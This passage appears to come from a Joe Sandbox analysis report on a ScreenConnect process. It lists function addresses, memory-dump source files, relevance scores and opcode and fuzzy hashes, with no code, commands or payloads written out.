                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3e358ebba3a13fa322af0e9c00577e2cdf82794c05448ff9b26e850e53afbca1
                                                                                                                                                                                                                                                          • Instruction ID: 8257c6ce34a7b05ae65bdaacf03720bd74ec9a12c30f1019823c28f809288325
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e358ebba3a13fa322af0e9c00577e2cdf82794c05448ff9b26e850e53afbca1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7415B307102159FCB14DF69E854AADBBF2BF88B14B14856CE806DB3A1DF709D04CB91
                                                                                                                                                                                                                                                          Function 015C7920 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8279e07b2c746f571a61c5bae1ac1a8c990d9c13a8acafe1c26ad428b4b08910
                                                                                                                                                                                                                                                          • Instruction ID: d66ebfabf9e40a5b49ea921d4718641b2cfd174f5912cefcdb57f5602d2584f2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8279e07b2c746f571a61c5bae1ac1a8c990d9c13a8acafe1c26ad428b4b08910
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11316B31B002098FEB14DFE9C498AAEF7F6EF89654F10946DE506EBA50DB70DD008B90
                                                                                                                                                                                                                                                          Function 03CF28E0 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7a50614e1377dd4ae740355463379d64c516eb7165d48e06a8c3d2a232009781
                                                                                                                                                                                                                                                          • Instruction ID: 753b55028648a17b08ec74c56484359420a2125c2344297396b7506b8b515a83
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a50614e1377dd4ae740355463379d64c516eb7165d48e06a8c3d2a232009781
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0318075B002098FDB04DBADD480AAEF7F6EFC9650B10846ED519EB344DB34EE018BA1
                                                                                                                                                                                                                                                          Function 03CF0007 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 297ba47208e41fedff764bfbf779c8193c46c6f71002d808640a7163fcf3c402
                                                                                                                                                                                                                                                          • Instruction ID: 4966a4243a108a7bb8ee364a7b424814faafd0a991dab5bf4d8cc814abafee3a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 297ba47208e41fedff764bfbf779c8193c46c6f71002d808640a7163fcf3c402
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE31E330B05244DFCB15CBA1DC657AD7FB6AF85B00F18805EE501EB2A2DF755A09CB41
                                                                                                                                                                                                                                                          Function 015C6FF1 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9a78e1dea77a7eb988142c4b33aa27fa92da77d340fdef377168b8b7a08122d9
                                                                                                                                                                                                                                                          • Instruction ID: f6aa36ede214715f3c8a3dfbd89bcf87a8debba39695eb13c5fe919df4a5ffc8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a78e1dea77a7eb988142c4b33aa27fa92da77d340fdef377168b8b7a08122d9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D31D071B002159F8712EBB8A9519AE73E2FFCA660300892CE405DB344EF70DE15AFD2
                                                                                                                                                                                                                                                          Function 015C6FF8 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 85d334404be8ba50020dd4edb689a81824329d5eef9c874a6783fcc7b9ff9b45
                                                                                                                                                                                                                                                          • Instruction ID: a637f138f44c19e1a2e5b7c8069dc5935f9df9563ac29596102e048918e0ead2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 85d334404be8ba50020dd4edb689a81824329d5eef9c874a6783fcc7b9ff9b45
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7031C275B002159F8701EBA9A95195E73E2FF8A660300892CE415DB344EF70DE15AFD6
                                                                                                                                                                                                                                                          Function 015CD7F8 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1391b797b7545a2e51f21d03d2beca9efd3edaaf8edb5d8e53b0fe20180eb3f9
                                                                                                                                                                                                                                                          • Instruction ID: 21ff60c63be6e87b04c7774768e24aae1baede10e455a3a5f4842afd7dbe9399
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1391b797b7545a2e51f21d03d2beca9efd3edaaf8edb5d8e53b0fe20180eb3f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77310774600B058FD730DFA9C8446AABBF1BF49724B144A2CD496DB6A5D730E94ACFC0
                                                                                                                                                                                                                                                          Function 03CF2CF8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4a2cbdb31349c2913f4cfe011bde8c18ccea3137db0ea240cabbad1622f63041
                                                                                                                                                                                                                                                          • Instruction ID: 0b4ced04f7491a1bfb515c5dbb5857663d0b55ea505693d6147e4a92a8a6db53
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a2cbdb31349c2913f4cfe011bde8c18ccea3137db0ea240cabbad1622f63041
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B31F534600B018FC774DF29D84865ABBF1AF88725B144A2CE556CB6F4DB70E949CB91
                                                                                                                                                                                                                                                          Function 015C7390 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b24f232f9c0453b733bcca7cd77d0b68e74ca0f7bbe832a6c742a71545ed69ca
                                                                                                                                                                                                                                                          • Instruction ID: d0abe9f8c88f5d4bc5a6ef9d8165280aede430b80596eeec7ed4f5a41c7da529
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b24f232f9c0453b733bcca7cd77d0b68e74ca0f7bbe832a6c742a71545ed69ca
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B231C070B046458FCB05DBA8D89466EFFB2FF8A710F1480AAD509DB395DA309C02CB91
                                                                                                                                                                                                                                                          Function 03CF17BF Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 338bf43d5bf091e4df2332ed92609b0f338771777f622a10a66578d16b841759
                                                                                                                                                                                                                                                          • Instruction ID: d32eaff0a2d2e7b35d2e9b2cc5c8464d009b8489cd06bfdf21b4433ce3f8347d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 338bf43d5bf091e4df2332ed92609b0f338771777f622a10a66578d16b841759
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 753129312057456FD701EB34E8A0BD9BBB1FF82624F00855AE041CF292CB70AC0ACBDA
                                                                                                                                                                                                                                                          Function 015C6568 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: abe018bd35b9e3aa2292f37a92e2d3ac6a71feb42bd14a2308f91cd81a1ce798
                                                                                                                                                                                                                                                          • Instruction ID: 318c0e6e14dd393baf590ec16c8982f39dce1a64f9e652c32dca6ebd74a4b0f8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abe018bd35b9e3aa2292f37a92e2d3ac6a71feb42bd14a2308f91cd81a1ce798
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 173106706007058FD730DF6AD844A6ABBF1BF89724B144A2CD496DB7A5DB30EA46CF80
                                                                                                                                                                                                                                                          Function 015CD808 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a68d87ca0e677533e6a593a124dc85949c7d559810fb5e5a8393d74662c14a71
                                                                                                                                                                                                                                                          • Instruction ID: 28eb10066692a03ace4f522dfe81464cc3345ac82898b9b6d5906889f0219caa
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a68d87ca0e677533e6a593a124dc85949c7d559810fb5e5a8393d74662c14a71
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0131E674600B058FD730DFA9C8446AAB7F1BF49724B144A2CD4A6DB6A5D730E94ACFC4
                                                                                                                                                                                                                                                          Function 015C36B0 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 97bba24039c2e2e319423429a4c75c8e547e5a0d4bc339379a4ed50b69da86c0
                                                                                                                                                                                                                                                          • Instruction ID: 6d9eebab583b43499b406a6be93ae527a964c8588428340a4d5a39787ba15bd5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97bba24039c2e2e319423429a4c75c8e547e5a0d4bc339379a4ed50b69da86c0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30312170A04309DFCB00EFB4E94865EBBB5FF46311B0485AAD915DB252EB309E00DBA2
                                                                                                                                                                                                                                                          Function 015C90A8 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 428afb36dc663780b5dfe4791c4e9edc69d08424374a253211ff8ca017a9abd8
                                                                                                                                                                                                                                                          • Instruction ID: 4e35c674e866faa43b74a0f4ecfcacf19f6aef563f48d11494d949f5599a116c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428afb36dc663780b5dfe4791c4e9edc69d08424374a253211ff8ca017a9abd8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2316670600B018FC730CF69D888A6AB7F1FF89B24B144A2CD496DB7A0DB31E905CB91
                                                                                                                                                                                                                                                          Function 015CD9B0 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8e19d9d2c3c4b1263dc295cf0ef2c9307334a7d50ca4a1b4b3bb04eedee8b5d8
                                                                                                                                                                                                                                                          • Instruction ID: 88b1d5cf19caa9a65ab88d15c8301ba827953ec87986cd5383757448e046c55b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e19d9d2c3c4b1263dc295cf0ef2c9307334a7d50ca4a1b4b3bb04eedee8b5d8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F3123706007018FD730DFAAC8446AAB7F1BF89624B108A2CD496DB7A1D771E946CFC0
                                                                                                                                                                                                                                                          Function 015CE4F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 660abb8e27522bd54203ef1bada55e5cbae7ed850cc69117d7130d55ef8e0c21
                                                                                                                                                                                                                                                          • Instruction ID: dfc4e51ac2ba086a5a6502a0dd6a7685f31348642c66e04c7047906e04467ef5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 660abb8e27522bd54203ef1bada55e5cbae7ed850cc69117d7130d55ef8e0c21
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8219571B012049FD7149FA5D856BAE7EB6FB88B10F18942CF102EB2D1EE759C41CB51
                                                                                                                                                                                                                                                          Function 03CF0040 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f2c8d7778afacf84741b4735f1f96eda00eadbd6a650ecf1ff95a6776af06611
                                                                                                                                                                                                                                                          • Instruction ID: bb1dc19a9d4372da5350dac208d98ec3b0553a7f7d4c3398087b45cf612e0ea1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2c8d7778afacf84741b4735f1f96eda00eadbd6a650ecf1ff95a6776af06611
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4218230B01218DFDB58DB65D8957AEBBB6AB88B00F14802DE502E73A1DF715E41CB91
                                                                                                                                                                                                                                                          Function 00FCD59C Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1900276926.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3b58f225748de0a050501be4e5e777a383cf68a335349be6f28571268632fe35
                                                                                                                                                                                                                                                          • Instruction ID: 36995366e1c98dae92548513c0efd6e8b432156f18eecf43cc52df5de24986dc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b58f225748de0a050501be4e5e777a383cf68a335349be6f28571268632fe35
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC212B72504205DFDB05DF10DAC1F1ABFA5FB98324F24C57DE8090B256C336D856EAA1
                                                                                                                                                                                                                                                          Function 015C36A0 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7f2823ced8fc37aab4d33d88d09464ada2c83203c4a26134b007c912a8d8777d
                                                                                                                                                                                                                                                          • Instruction ID: 000f9cf46ebf212c4ceb6ddf79d1a056a0a8b81cd3243884f514cd1a3578c32c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f2823ced8fc37aab4d33d88d09464ada2c83203c4a26134b007c912a8d8777d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A621F571A04219CFCB10EFB8DD4856E7BB6FF49721B14826AD916CB395EB30D900DB51
                                                                                                                                                                                                                                                          Function 015CE190 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fa8a668283a4e67942bd26c6e700dcc06e602451a919aec847ccadcb5fd07a8c
                                                                                                                                                                                                                                                          • Instruction ID: b43efd1179885ea54eb14763db838159b3bc74d34ba2063ff00acf8d93407b33
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa8a668283a4e67942bd26c6e700dcc06e602451a919aec847ccadcb5fd07a8c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D216F716002099FCB01DFA4DC82AAEBBF5FF89620B10852AE515EF315DB30ED158B91
                                                                                                                                                                                                                                                          Function 03CF4660 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: fd162c6b6893e7c81f7d17f4e5980d81408b838e3c129dc643119938d986d669
                                                                                                                                                                                                                                                          • Instruction ID: 19f4871c9447b17843e23bbfb90025357294056068517e47eb46c3a8f33a73c7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd162c6b6893e7c81f7d17f4e5980d81408b838e3c129dc643119938d986d669
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22211635A012198FDF58DBA9D854AEEBBF2BF8D310F1540A9D105EB360DB78AD40CB90
                                                                                                                                                                                                                                                          Function 03CFFEE8 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d7dea44d6442e3dd944dfc999683776f2ab0a22658f329405417c91232b26ad9
                                                                                                                                                                                                                                                          • Instruction ID: 2ba99404feec1eb67f7f5a317845130af67968b6a99765a3c729109feec5fc7b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7dea44d6442e3dd944dfc999683776f2ab0a22658f329405417c91232b26ad9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A21D532E0060A9FCB11DFA9DC90AEEF7B5FFD9300B258259E544F7251DB70A94287A0
                                                                                                                                                                                                                                                          Function 03CF4650 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b00d55baadc3940a2b119bc04d16ca986f83e9b41172afd2f66f7da951a5a9b6
                                                                                                                                                                                                                                                          • Instruction ID: de6c7710493c1ecd228ddbde7f31c58bc3c77f3926b84c39255924477379d4de
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b00d55baadc3940a2b119bc04d16ca986f83e9b41172afd2f66f7da951a5a9b6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD214C31A012198FDF58DF68D454BAEBBF2AF8A310F1540A9D105EB3A0CB749D40CB90
                                                                                                                                                                                                                                                          Function 015CF878 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 19e02acd4ba9ebc43b0584ddbbd172c025acd00bc29285a85d0ecf1aff9a133c
                                                                                                                                                                                                                                                          • Instruction ID: 3624eefe7e2a4cedc0cb1bc1c8bed9b4a52bb40d17c0643f4e57950708487b07
